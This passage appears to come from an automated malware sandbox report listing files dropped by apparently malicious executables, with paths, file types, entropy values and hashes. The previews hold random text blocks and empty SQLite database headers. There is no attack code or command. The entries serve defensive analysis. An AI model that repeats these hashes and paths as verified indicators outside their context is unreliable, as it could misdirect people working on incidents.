                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
